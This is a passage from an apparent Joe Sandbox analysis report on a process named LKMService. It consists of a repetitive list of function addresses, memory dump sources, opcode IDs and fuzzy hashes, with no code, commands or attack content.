                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 55a953b8f6e55dbd5d5dd04ed60b5857d91fa727a96fdd4bd95e2f3c15793e46
                                                                                                                                                                                                                                            • Instruction ID: e4d66911d4d465bacfdfd6d673074cd0449882c5376505ec51e8451ef9b8ae4b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55a953b8f6e55dbd5d5dd04ed60b5857d91fa727a96fdd4bd95e2f3c15793e46
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2112132E1025A9BDB01DBB8DC404EEBB77EFC6311F164726E141B7290E7702A5AC7A1
                                                                                                                                                                                                                                            Function 0151D767 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4561501132.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_151d000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                                                                                                                                                                            • Instruction ID: c97fd185a181b40f7e66f456a59e28f119a2288328d52b7eb4bb53daaa044a5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59118C76904244EFDB06CF54D5C4B1ABF72FB84224F2485A9DC490A25AC33AD45ACBA2
                                                                                                                                                                                                                                            Function 058B5580 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f82aa845293785949c7b862e9b7be202cbc190a0f545ea11319f88c04b7ac241
                                                                                                                                                                                                                                            • Instruction ID: 17d38b633c3516c5c4d41a154d6e4486d55eabfe919c2c3fdd3a134a1c76c31a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f82aa845293785949c7b862e9b7be202cbc190a0f545ea11319f88c04b7ac241
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD11CA33D2021D9BDB10CBA8DC404DEB77AEF99710F114712E521F7290EB716A55C791
                                                                                                                                                                                                                                            Function 058B4DE0 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e6e2f96c477c92d203a14fba7fa24a51a4a04e7246e1d99378f2268433c58ac1
                                                                                                                                                                                                                                            • Instruction ID: 37d614e15c56a828f761429fa1eaa23efb1a1ba658f63b1fb959a76737d4b833
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6e2f96c477c92d203a14fba7fa24a51a4a04e7246e1d99378f2268433c58ac1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3611E732D1061A8BDF00CBB8D8400DDFB73EFCA310F168627D551BB260EB7155598791
                                                                                                                                                                                                                                            Function 058BA148 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0c988d6ab00a5f6512e8d8fc8f65a063d5d742c57cc29306f83929c92c746c98
                                                                                                                                                                                                                                            • Instruction ID: 8247532cc9d77bf58f3539566ce8c6ae6bbd7a89dc97cd2d801c736b721c1147
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c988d6ab00a5f6512e8d8fc8f65a063d5d742c57cc29306f83929c92c746c98
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3118231E007168BCB04ABB9D4540AEF3B1FFC5200710C71AD55A7B244EF30A9958790
                                                                                                                                                                                                                                            Function 058B48CD Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d695d7692393eee2090562d78e27549d5625800fe4e5aec66d788a1d57a34a19
                                                                                                                                                                                                                                            • Instruction ID: c65c359c21127a30136a4edc927f2ddbba9b4f6046fddadaa97204c35471bbe0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d695d7692393eee2090562d78e27549d5625800fe4e5aec66d788a1d57a34a19
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2115E35A04109CFEF14CBA8C5819ECB7B7FB89314B298652D916EB362C772ED56CB40
                                                                                                                                                                                                                                            Function 058B5B20 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e3889d1d8f2dec6313d0aa924b5f11bc0effd8dc268c0b922e650a3bdd10d3e7
                                                                                                                                                                                                                                            • Instruction ID: 242f4acdefe073d37e178cbc560488cca78af6848b4282a84728930f6bc1a979
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3889d1d8f2dec6313d0aa924b5f11bc0effd8dc268c0b922e650a3bdd10d3e7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9118231E0071A8BCB15ABB9D4540AEF7B5FFD9200711C61AD45ABB244EF30A98587D0
                                                                                                                                                                                                                                            Function 058B91F8 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 613aa2937e0ee295f9401cb9d507fbca67bf8988a38098acb474b8ad56f85fa5
                                                                                                                                                                                                                                            • Instruction ID: 6fe6b680b225a53d58d8f7a89071d6423e63fbb2aafbe5c0e1868ec30fa6629c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 613aa2937e0ee295f9401cb9d507fbca67bf8988a38098acb474b8ad56f85fa5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C911A532D2065AE7DF04CAA8E8404DEF776EFC5310F658723EA22F7360EB7169168651
                                                                                                                                                                                                                                            Function 058B5370 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b5847c81f7cb77095baa930593c902c92431e5837d92da8aa9ae3bbb1bd29d6d
                                                                                                                                                                                                                                            • Instruction ID: 8879986efc86779d4da77b1c370dc755c1aba4a62252acbf89b487917b0f5fb4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5847c81f7cb77095baa930593c902c92431e5837d92da8aa9ae3bbb1bd29d6d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5211A331710229CBEB18DA68C8146EE77FAFB89305F14492DD902EB394DBF59D41C792
                                                                                                                                                                                                                                            Function 058BCD99 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9c4cd1f7e016666e2a7d98ace5953421a3fee6f8f775339e8a4115cb74b26eee
                                                                                                                                                                                                                                            • Instruction ID: aed0b5876415efbbc454feb4b25ed5b4ecabe9d21579e18ce150c3697dbb2146
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c4cd1f7e016666e2a7d98ace5953421a3fee6f8f775339e8a4115cb74b26eee
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A101D635B046589BDB05D6ACA8108FFBFBFAFC62207284466E801E7301CE650D159762
                                                                                                                                                                                                                                            Function 058B4DF0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 7e76cc6aa23f06972bb7f3693cbabdf06594087ac7037b5e7057882b309861ae
                                                                                                                                                                                                                                            • Instruction ID: 9b43ac018d10c28e2edc6d683f0991b8d096ffe64b16662e61b030af3c958838
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e76cc6aa23f06972bb7f3693cbabdf06594087ac7037b5e7057882b309861ae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39110832E2051A87CF00DBB9D8004EEF7B7EFCA310F118722D511B7260EB7169598791
                                                                                                                                                                                                                                            Function 058B6C90 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4a7ce46a0a4679d53bb5e21115a71b925f9ae6c3fe391856e622787fa256bab6
                                                                                                                                                                                                                                            • Instruction ID: b97923020bfbe6826103dbfd0464a7eef5f7ad36e7dfea7532d4e312e31991b6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a7ce46a0a4679d53bb5e21115a71b925f9ae6c3fe391856e622787fa256bab6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE11BF70D04209DFDB04DFA9E8501EEBBB6FF86204B14CAAAC815D7305E7705E028B41
                                                                                                                                                                                                                                            Function 058B4CF0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1b50454493de9c1e357c59cbc70b0eb4aecf876313ea2e97b041c50095da0204
                                                                                                                                                                                                                                            • Instruction ID: c2bf2c6eac653d6661c502a10072b019c30af7ab70c67b3e307b3dfb6586167b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b50454493de9c1e357c59cbc70b0eb4aecf876313ea2e97b041c50095da0204
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A20149313003129BE345867AA8113AA7BDBBFC2624F14886ED40ACF392DBA16C05C384
                                                                                                                                                                                                                                            Function 058B7C18 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 672abc06fdbd93e770e2012d28d6cafd4936a39db6613ff516f05cdf253767fa
                                                                                                                                                                                                                                            • Instruction ID: 535ab68c209c9f116804cb907f97a37eff1b07082b4f0b22e4b825af117cb910
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 672abc06fdbd93e770e2012d28d6cafd4936a39db6613ff516f05cdf253767fa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C019272D1574A8BCB409BB9C8004EEFBB6EFCA310F118712D251B7250EB70255A8BB1
                                                                                                                                                                                                                                            Function 058B6B16 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e526b70ce687868fcea9f5c260bfee769cd033632d4a539c34c03236af2e702c
                                                                                                                                                                                                                                            • Instruction ID: 4b29ca7ed89b0e793a039032f6511fc1fdaefe4e4c7882ae7900914325d85e70
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e526b70ce687868fcea9f5c260bfee769cd033632d4a539c34c03236af2e702c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3211E032D2020ADBEB00DFAAE8868CDB7B9FF85300B550616E610B7290FB70341ACB45
                                                                                                                                                                                                                                            Function 058BB808 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 08f2a346cce6779b5cb9b0fb7cbef01f93060533708a1585f7d87aad9dca8f38
                                                                                                                                                                                                                                            • Instruction ID: 866ed2582f2b7e5ba8ec8e4f351008dc5ff0843f3bc9c595d428e41c51eb24eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08f2a346cce6779b5cb9b0fb7cbef01f93060533708a1585f7d87aad9dca8f38
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C01DE32E1061A97DB00DEB8DC405DDB7BAEFDA321F224722E501B7250EB707A5A8795
                                                                                                                                                                                                                                            Function 058B7EA1 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6e0c20eb17947d75cd286cf5f835e10a4ef3be538a96151561135101f8c1ce94
                                                                                                                                                                                                                                            • Instruction ID: c1954a0f71c47bc18ccb397034e49b082e086ad7078f22701cfc262be3a6c8b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e0c20eb17947d75cd286cf5f835e10a4ef3be538a96151561135101f8c1ce94
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28014532B1420A8FFB04CA7898104ADB7A7EBC5660B198157D541FB354CB30DD168B54
                                                                                                                                                                                                                                            Function 058B6CA0 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f8d99a7f434196d5b59336feafe61c8321fb18eb9dd9261d20419a0bb028d558
                                                                                                                                                                                                                                            • Instruction ID: 1c7d74d038da7fcd9d44ac33dadf98436253a0ee4a2ad65a1c84e248c7bcda64
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8d99a7f434196d5b59336feafe61c8321fb18eb9dd9261d20419a0bb028d558
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81117074E0021EDFDB44DFA9E5541ADBBB6FF85204F5489A9C815D7305F7705E028B81
                                                                                                                                                                                                                                            Function 0151D1C5 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4561501132.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_151d000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 298dd495a65fe5fd79c5f6becbfa125707fdd5f174dd496b366bdffa5d5def4b
                                                                                                                                                                                                                                            • Instruction ID: ef2a57cb0315fd381cfc5babd4016c6236b592e4e6213015db79e9bbd50f972a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 298dd495a65fe5fd79c5f6becbfa125707fdd5f174dd496b366bdffa5d5def4b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C018831004344AAF7124A69D988B96FFF8FF45634F14C459ED290E18AC679D445C671
                                                                                                                                                                                                                                            Function 058B4D00 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 03c832cba326554a89106e6b1b6716703a7a2dd441635eefa3ccfa7c03bbc755
                                                                                                                                                                                                                                            • Instruction ID: 293dccbd55ccc69700f11dbb77ea44b0092df1513e3fe88dedd18a935439f06e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03c832cba326554a89106e6b1b6716703a7a2dd441635eefa3ccfa7c03bbc755
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B60149313002129BE3449ABEAC116AAB7DBFBC5620714883EE50ECF391DF60AD048384
                                                                                                                                                                                                                                            Function 058B8878 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 7c7803800a4c41537f1c4aa85c1276534ad65c17b862630260db8258e2911fb3
                                                                                                                                                                                                                                            • Instruction ID: 1b09d2f57f720ad470263661f72c16b331542374e7f9f73b877ac1a22838feea
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c7803800a4c41537f1c4aa85c1276534ad65c17b862630260db8258e2911fb3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB01B132D0564BDADB009BB5C8004EEBF72AECA320F154B56D15177160E770269ECBA2
                                                                                                                                                                                                                                            Function 058BCDE1 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e9b21b0000d00c51cfbd4196252cd23f06e90f467c836175830fc18950d99213
                                                                                                                                                                                                                                            • Instruction ID: 73cc67274b4599d4727322aa96e69c44c51a7c2fd2824d4153ffc01b6a190af7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9b21b0000d00c51cfbd4196252cd23f06e90f467c836175830fc18950d99213
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD014F32D1165AAADF01DBB8DC404DDFB76EEC6310F164712E141B7150E774255AC7B2
                                                                                                                                                                                                                                            Function 058B8DFF Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5b4f1d55a450478fe7197852b683852c89023f46bb988fd78409ee2dad70db45
                                                                                                                                                                                                                                            • Instruction ID: 29ee670b6bfb0e6b5b39e96170b58b57e0df675343b603f45fe3e38231b832bd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b4f1d55a450478fe7197852b683852c89023f46bb988fd78409ee2dad70db45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87019E32D1464A9BCB00DBB9D8004DEFBB2AFCA310F158726D151BB260E7702559CBA2
                                                                                                                                                                                                                                            Function 058B6558 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e06c92b96432b8bd0bbaf2d05ee2a5a4489400fc04c31ed0cf0d7ba55c8df31f
                                                                                                                                                                                                                                            • Instruction ID: 82f8908c794529ef2c1aaa62e0bdd7b11326d264d6d3184e65ee7da1e91f9c7c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e06c92b96432b8bd0bbaf2d05ee2a5a4489400fc04c31ed0cf0d7ba55c8df31f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFF0C872E10109EBDB14D764D8659EF7BBA5F84300F05492AD812F7740EEB5190A8BE1
                                                                                                                                                                                                                                            Function 058B7CA8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
